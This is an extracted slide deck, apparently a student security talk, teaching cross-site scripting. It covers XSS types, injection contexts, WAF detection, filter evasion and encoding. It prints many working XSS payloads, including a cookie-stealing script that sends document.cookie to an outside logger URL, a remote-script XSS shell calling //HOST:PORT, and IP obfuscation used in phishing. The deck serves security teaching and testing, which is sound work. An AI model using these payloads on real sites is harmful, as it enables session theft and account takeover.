This document provides an introduction to cross-site scripting (XSS) attacks over the course of one hour. It defines XSS and its different types (reflected, stored, DOM), discusses common injection points and payloads, and techniques for bypassing filters including encoding, evasion tricks, and tools. The goal is to teach novices the basics needed to find and exploit XSS vulnerabilities, with tips on contexts, detection, encoding, and actual attack vectors like cookie stealing.

1. XSS Primer: Noob to Pro in 1
hour
By @snoopy_security

2. Who and Why
•
Student & Junior Security Consultant.
•
XSS is a easy win if you do it correctly.
•
Bug bounties pay well and clients give you respect.
•
Cross site scripting is one of the oldest web application
attacks known and is to be dated around 1996-1998

3. What is XSS?

Untrusted data from user is processed by the
application without any sort of validation.

It affects client side but the vulnerability resides in the
server side.

Different types Reflected, Stored and DOM XSS

4. What is XSS?

5. Reflected XSS
What is wrong with the above code?

The above code just prints the comment which is
retrieved from the $_GET variable.
Can add malicious JavaScript with the original URL.

<?php

echo '<h1>Hello ' . $_GET["name"]. '</h1>';

6. Some Beginner Tips

XSS can come from anywhere. Some common ones are

URL parameter

Headers i.e user agent

Metadata

Input forms

Text area

Hidden fields

Flash parameters

File Uploads

7. Some Beginner Tips

1. Try injection HTML Tags as well and malicious JavaScript
2. SVG is always good for a short and crisp attack vector. Can
add whitespaces forward slashes and unclosed tags.
3. Add junk data with your payload
4. Always try a couple of different payloads. This mainly
applies when trying to evade filters.

"><svg/onload=prompt(1)>

8. Stored XSS

Malicious payload is stored by the server though database
or other forms of storage and is reflected back.

This form of attack is easier than phishing with XSS
payloads.

Can get admin cookies as well access to the internal
network depending on the attack vector.

9. DOM XSS
The document object model is a structured representation of
the web page rendered by the browser.
DOM is where event handlers and any other JavaScript
functions execute. DOM shows all the JavaScript and HTML
rendered by your browser.
DOM defines a way a webpage accessed and manipulated.
An attacker can manipulate the DOM by adding malicious
JavaScript which can change elements set by the DOM to
attack a victim.

10. DOM XSS

To find DOM XSS, analyse the JavaScript being executed on
the page and see if DOM being written.

DOM is not view source. Inspect element is a better visual
representation of the DOM.

ZAP,Burp and other proxies does pick up unsafe methods
but you will need to check manually.

If it cannot be exploitable, try figuring about what library
and unsafe sink the application is using. E.g. jquery .attr()

11. DOM XSS

Common methods used to access DOM

document.location

document.URL

document.URLUnencoded

document.referrer

window.location

Passed data can then be written by methods such as eval,
document.write and window.setinterval.

12. Useful sources
OWASP DOM XSS prevention cheat – gives you good
explanation on unsafe methods that directly modify DOM.
The DOM XSS wiki
:https://code.google.com/p/domxsswiki/wiki/Introduction
The wiki has useful information on dangerous methods,
common sources and sinks.
Other variations include Mutation XSS. More on that later…..

13. Context is Everything
Context is where the given input is reflected back.
Five common ones
1. HTML
2. Attributes
3. Script
4. URL
5. Style

14. HTML Context

Malicious input in reflected back in the html body in tags
such as <div><p><title> and more.

Easiest to attack

Close the tag and try <script>alert(1)</script> or any similar
payload.

15. Attribute Context

HTML elements can have attributes. Attributes are

Input is reflected in a attribute element. So look for input
being reflected back in ‘value =‘ or ‘alt =‘ or something
similar.

Most of the time, attributes will be inside a single or a
double quote.

16. Couple of tips
1. Break out of the context by closing the quote and attribute
tag. E.g ‘>
2. Any type of encoding won’t help your payload if you can’t
break out of context.
3. If in doubt, URL-encode any special characters that
have signify & = + ; and space. aas' onload='prompt(0);''
4. Event handlers can also be used to attack attributes aas'
onload='prompt(0);''

17. Script Context
The input will be reflected back inside a script tag. break out
of text with quotes and execute
Input is usually reflected back as part of a variable.
Payload example 
junk' ; alert(1);//

18. URL Context

The input is reflected back in a href attribute. E.g.

<iframe src=“[Reflected Data]”>

<a href==“[Reflected Data]”>Link</a>

<META http-equiv=“refresh” content=““[Reflected Data]”>

No need to break out of context. Only need to encode
payloads. This type of context requires the victim to click
the URL to execute.

19. Tips

Common ways to attack URL Context
The above payload is base64 encoded. More about encoding
later.
You can also define the charset just like data, this might be
useful in some cases.

javascript:prompt(0)
data/text/html;base64, PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

20. CSS Context
Also know as style context
Input is usually reflected in inside a style tag
Can be attacked using
Another common one

width:expression(alert(‘XSS’))

21. WAF Detection
Usually Regex, Blacklist or whitelist based
WAF can sometimes detect inbound as well as outbound.
Most WAFs still detect using a signature based approach.
Common way to detect WAFs: Modified cookies, rewritten
headers and response codes

22. WAF Detection

Find combinations of allowed and block characters first.

Some known tools to detect WAF.
•
Wafw00f
•
http-waf-fingerprint NSE script
•
http-waf-detect NSE script
Will only detect the popular ones.

xss,<>{};”’script

23. Filter Evasion 101

More than one ways to skin a web app!

If <script> tag is blocked>
If site is filtering double and single quotes, you can use back
tick (`). This technique only works on IE.
“><script >alert(document.cookie)</script >
“><ScRiPt>alert(document.cookie)</ScRiPt>
“%3e%3cscript%3ealert(document.cookie)
%3c/script%3e
“><scr<script>ipt>alert(document.cookie)</scr</s
cript>ipt>
%00“><script>alert(document.cookie)</script>

24. Filter Evasion
Some popular techniques consists of spaces, encoding and
comments. Try using prompt or confirm instead of alert
Calling a external JavaScript file from inside a script source tag
if brackets and quotes are blocked.
If the application is filtering quotes or blocking script tags, try
the below

<SCRIPT
SRC=https://web.archive.org/web/20150121175718/http://ha.cker
s.org/xss.js></SCRIPT>

<img/src=x onerror=prompt(/XSS/);>

25. Filter Evasion
When in doubt, try to comment everything after your
payload.
If less than and greater than sign is filtered in attribute
context, try
If script and src tags are blocked in a html context, try
<script>alert(1)</script><!-- (html/attribute context)
“;alert(5);// (script context)

“ onload=“prompt(0);””

<object data=“javascript:alert(0)”>

26. Filter Evasion resources
Too many techniques to present. Check them out here
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat
_Sheet
http://codev587.net/xss-filter-evasion-cheat-sheet-no1.html
http://n0p.net/penguicon/php_app_sec/mirror/xss.html

27. Encoding
Encoding – transferring data from one format to another. E.g.
ASCII, Unicode, URL Encoding etc
Browsers support numerous encoding schemes but the attack
vector depends on the page and its meta tag e.g.
Encoding is useful if the server is decoding correctly. Still need
to break out of context correctly for the encoded payload to
work.
<svg/onload=alert&#40&#41>>

28. Encoding
The following table describes how a user can obfuscate an IP
address:
This trick is getting more common among phishers. E.g.
http://0xd2.0xdb.0xf1.0x7b/.online/BankofAmericaOnlineID/
SignIn
URL Form
http://127.0.0.1/ Decimal
http://2130706433/ Dword
http://0x7f.0x00.0x00.0x01/ Hex
http://0177.0000.0000.0001/ Octal
http://127.0x00.0000.0x01/ Mixed

29. Encoding
fromCharCode() method converts Unicode values into
characters
Long UTF-8 Unicode encoding to bypass filters
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<img src=x
onerror="&#0000106&#0000097&#0000118&#0000097&#00001
15&#0000099&#0000114&#0000105&#0000112&#0000116&#0
000058&#0000097&#0000108&#0000101&#0000114&#0000116
&#0000040&#0000039&#0000088&#0000083&#0000083&#000
0039&#0000041">

30. Encoding
Encoding can also be useful to break up an XSS payload if the
server is using pattern matching regex.
Can also double encode payloads. Depends on how the
application processes encoded client requests.
The hexadecimal encoding of “../” represents "%2E%2E%2f“
Double encoding of “../” represents "%252E%252E%252F"
<IMG SRC="jav&#x09;ascript:alert('XSS');">

31. More Filter Evasion
ASCII Decimal Encoded
Will turn into alert(‘XSS’). The payload uses html entities
which is decoded and rendered by the browser.
ASCII Hex Encoded
Useful for bypassing ‘magic_quotes_gpc’
&#106;&#97;&#118;&#97;&#115;&#99;&#114;
&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;
&#40;&#39;&#88;&#83;&#83;&#39;&#41;
&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70
;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x2
7;&#x58;&#x53;&#x53;&#x27;&#x29;

32. Encoding
More Examples here:
http://htmlpurifier.org/live/smoketests/xssAttacks.php
https://danielmiessler.com/study/encoding/
Some useful encoders:
http://n0p.net/penguicon/php_app_sec/mirror/xss.html
http://evuln.com/tools/xss-encoder/
https://mothereff.in/html-
entitieshttp://dev.w3.org/html5/html-author/charref
https://hackvertor.co.uk/public
http://utf-8.jp/public/jjencode.html?src=

33. Actual attack vectors
<script>window.location="http://example.com/logger.php?
cookie="+document.cookie;</script>
When executed, the above code sends the victims cookie to
an attacker controlled site.
Can be used for many things including cookie stealing, drive
by downloads, running browser exploits, phishing and
more.
BeEF makes everything easy
More cool XSS payloads:http://www.xss-payloads.com/

34. Useful tools

Opinion: Most scanners suck at finding XSS.

Couple of tools I like – Xenotix, XSSValidator Burp Plugin,
Sleepy puppy (If testing multiple applications, has trackable
XSS payloads)
How to build a scanner that works?
A - Scanning within a browser engine.
B - Using PhantonJS or similar webkit detect successful
reflected XSS.
I still prefer finding XSS manually but I like having options

35. XSS Shell Demo
Cool POC by Brutelogic. Fun way to report XSS than just
script alert(1).
Attacker machine listener
Target payload
<svg/onload=setInterval(function()
{d=document;z=d.createElement("script");z.src="//HOST:PORT";d.
body.appendChild(z)},0)>

36. Things I didn’t mention
Flash XSS – Embedded SWF files can be decompiled to source
code. This can be used to find unfiltered variables which can
be called from an URL to include malicious XSS.
XSS Polyglot – Upload a flash file and be accepted as vaild
JavaScript. Run remote XSS with src tag. (can be beat CSP in
rare cases)
Mutation XSS – There are more ways to trick DOM into
parsing malicious XHTML like payloads.
All worth checking out…..

37. @snoopy_security
IRC:#SHUHACKSOC
Website:http://shuhacksoc.co.uk